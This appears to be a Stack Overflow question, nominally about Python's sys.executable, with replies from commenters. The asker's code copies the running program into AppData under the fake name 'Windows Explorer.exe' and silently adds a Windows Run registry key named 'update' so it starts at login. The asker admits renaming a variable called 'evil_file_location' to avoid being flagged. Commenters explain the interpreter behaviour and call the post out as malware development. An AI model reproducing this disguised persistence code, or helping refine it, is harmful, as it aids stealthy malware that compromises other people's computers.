# How to use the sys.executable

Tags: python, python-3.x, sys

*So I have this method*

```
def presistent(self):
    file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
    if not os.path.exists(file_location):
        shutil.copyfile(sys.executable, file_location)
        subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "{}"'.format(evil_file_location), shell=True, stdout=subprocess.DEVNULL, stdin=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
```

That the libraries uses shutil and sys, when I did a little digging to find out what actually is the sys.executable I found this:

***sys.executable is a built-in variable in Python that returns the path to the executable binary file of the Python interpreter that is currently running.
This means that when you execute a Python script, sys.executable returns the path to the Python interpreter executable file that was used to run the script.
For example, if you're using the Python interpreter that's installed on your computer, sys.executable will return the path to the executable file for that installation.***

***When you run a Python script, the Python interpreter that is installed on your system is used to execute the script. So, if you're running a script from a packaged Python executable that is installed in C:\Users\win10\Downloads, the value of sys.executable will still be the path to the Python interpreter executable file that is installed on your system, not the path to the packaged Python executable that you're running the script from.
For example, if you're using the Python interpreter that is installed in C:\Python39\python.exe to run your Python script (even if the script is located in C:\Users\win10\Downloads), sys.executable will return C:\Python39\python.exe.***

But then thing that I do not quite understand is when I run Windows Explorer.exe that is in the "appdata" it runs the actual, original Python script and not the Python interpreter. But according to the information I found it should copy the Python interpreter and paste it into the "appdata" path
and when I run it should run the Python interpreter and not the file. Please correct me if I am wrong.

Comment: How do you think you run a Python script? You run it _with a Python interpreter_. Running "the actual, original Python script" is something that a Python interpreter is used to accomplish.

Comment: Ok I run it with a Python interpreter but if you go into your machine and type C:\Python39\python.exe it is going to show you the Python interpreter, it will not run any Python code. So when we copy the interpreter and execute it it should show us the Python interpreter and not run the code(?)

Comment: _If you don't pass it any arguments_, yes. But if you pass the code to run as an argument, then you get that code run.

Comment: Anyhow -- this doesn't seem to me like it's a question about how to use `sys.executable` at all; it's much more a question about a specific persistence method for malware on Windows. `sys.executable` does indeed point just to the Python interpreter without any reference to the script; some other moving pieces are needed to make the script itself be invoked, but unless we have a complete enough [mre] we can test it ourselves, we can't say what that is (and even if you _were_ providing a MRE, it probably would be off-topic)

Comment: (BTW, notice how you're using `file_location` in one place and `evil_file_location` in another?)

Comment: Anyhow -- if `file_location` is the interpreter, and `evil_file_location` is the script, and they're two different things installed in two different ways (of which you're only showing us one of those two), then there's no puzzle / surprise / confusion left.

Comment: No I just replaced evil_file_location with file_location to not get flagged but I seem to have forgot that one

Comment: It's pretty obvious that you're asking about hiding malware on a system. Legitimate software doesn't go out of its way to hide executable names; removing the word `evil` doesn't change that.